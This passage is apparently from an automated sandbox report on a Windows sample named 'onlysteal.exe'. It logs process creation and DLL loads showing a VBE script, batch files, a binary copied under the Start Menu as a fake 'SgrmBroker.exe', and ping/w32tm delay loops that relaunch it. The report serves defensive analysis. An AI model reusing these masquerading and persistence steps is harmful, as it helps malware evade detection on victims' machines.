                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe "C:\Users\Default\Start Menu\Programs\SgrmBroker.exe"
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zuhvZR4ed0.bat"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe "C:\Users\Default\Start Menu\Programs\SgrmBroker.exe"
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\szcAPjpm25.bat"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe "C:\Users\Default\Start Menu\Programs\SgrmBroker.exe"
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Y6Uf3masa9.bat"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe "C:\Users\Default\Start Menu\Programs\SgrmBroker.exe"
                                  Source: C:\Users\user\Desktop\onlysteal.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Intorefnet\wF0tJ2zNcmafpzDn9Ons.vbe" Jump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Intorefnet\Te60v9QbFjSF8KEQUR.bat" "Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Intorefnet\hyperBlockCrtCommon.exe "C:\Intorefnet/hyperBlockCrtCommon.exe"Jump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\fmCyxdZe80.bat" Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe "C:\Users\Default\Start Menu\Programs\SgrmBroker.exe" Jump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zuhvZR4ed0.bat" Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe "C:\Users\Default\Start Menu\Programs\SgrmBroker.exe" Jump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\szcAPjpm25.bat"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe "C:\Users\Default\Start Menu\Programs\SgrmBroker.exe"
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Y6Uf3masa9.bat"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe "C:\Users\Default\Start Menu\Programs\SgrmBroker.exe"
                                  Source: C:\Users\user\Desktop\onlysteal.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                  Source: C:\Users\user\Desktop\onlysteal.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                  Source: C:\Users\user\Desktop\onlysteal.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                  Source: C:\Users\user\Desktop\onlysteal.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                  Source: C:\Users\user\Desktop\onlysteal.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                  Source: C:\Users\user\Desktop\onlysteal.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\Desktop\onlysteal.exeSection loaded: dxgidebug.dllJump to behavior
                                  Source: C:\Users\user\Desktop\onlysteal.exeSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Users\user\Desktop\onlysteal.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\Desktop\onlysteal.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Users\user\Desktop\onlysteal.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\Desktop\onlysteal.exeSection loaded: dwmapi.dllJump to behavior
                                  Source: C:\Users\user\Desktop\onlysteal.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Users\user\Desktop\onlysteal.exeSection loaded: riched20.dllJump to behavior
                                  Source: C:\Users\user\Desktop\onlysteal.exeSection loaded: usp10.dllJump to behavior
                                  Source: C:\Users\user\Desktop\onlysteal.exeSection loaded: msls31.dllJump to behavior
                                  Source: C:\Users\user\Desktop\onlysteal.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\Desktop\onlysteal.exeSection loaded: windowscodecs.dllJump to behavior
                                  Source: C:\Users\user\Desktop\onlysteal.exeSection loaded: textshaping.dllJump to behavior
                                  Source: C:\Users\user\Desktop\onlysteal.exeSection loaded: textinputframework.dllJump to behavior
                                  Source: C:\Users\user\Desktop\onlysteal.exeSection loaded: coreuicomponents.dllJump to behavior
                                  Source: C:\Users\user\Desktop\onlysteal.exeSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Users\user\Desktop\onlysteal.exeSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\Users\user\Desktop\onlysteal.exeSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Users\user\Desktop\onlysteal.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\Desktop\onlysteal.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\Desktop\onlysteal.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\Desktop\onlysteal.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\user\Desktop\onlysteal.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\user\Desktop\onlysteal.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Users\user\Desktop\onlysteal.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Users\user\Desktop\onlysteal.exeSection loaded: edputil.dllJump to behavior
                                  Source: C:\Users\user\Desktop\onlysteal.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Users\user\Desktop\onlysteal.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Users\user\Desktop\onlysteal.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Users\user\Desktop\onlysteal.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\user\Desktop\onlysteal.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\Users\user\Desktop\onlysteal.exeSection loaded: policymanager.dllJump to behavior
                                  Source: C:\Users\user\Desktop\onlysteal.exeSection loaded: msvcp110_win.dllJump to behavior
                                  Source: C:\Users\user\Desktop\onlysteal.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Users\user\Desktop\onlysteal.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Users\user\Desktop\onlysteal.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\Users\user\Desktop\onlysteal.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\Desktop\onlysteal.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\Users\user\Desktop\onlysteal.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\Desktop\onlysteal.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\Desktop\onlysteal.exeSection loaded: pcacli.dllJump to behavior
                                  Source: C:\Users\user\Desktop\onlysteal.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: ktmw32.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: dlnashext.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: wpdshext.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: edputil.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                                  Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                                  Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                                  Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
                                  Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
                                  Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
                                  Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
                                  Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dllJump to behavior
                                  Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: ktmw32.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: rasapi32.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: rasman.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: rtutils.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: mswsock.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: winhttp.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: iphlpapi.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: dhcpcsvc.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: dnsapi.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: dlnashext.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: wpdshext.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: edputil.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                                  Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                                  Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dllJump to behavior
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dllJump to behavior
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dllJump to behavior
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dllJump to behavior
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dllJump to behavior
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dllJump to behavior
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dllJump to behavior
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: mscoree.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: version.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: windows.storage.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: wldp.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: profapi.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: cryptsp.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: rsaenh.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: cryptbase.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: sspicli.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: ktmw32.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: rasapi32.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: rasman.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: rtutils.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: mswsock.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: winhttp.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: ondemandconnroutehelper.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: iphlpapi.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: dhcpcsvc6.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: dhcpcsvc.dll
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeSection loaded: dnsapi.dll
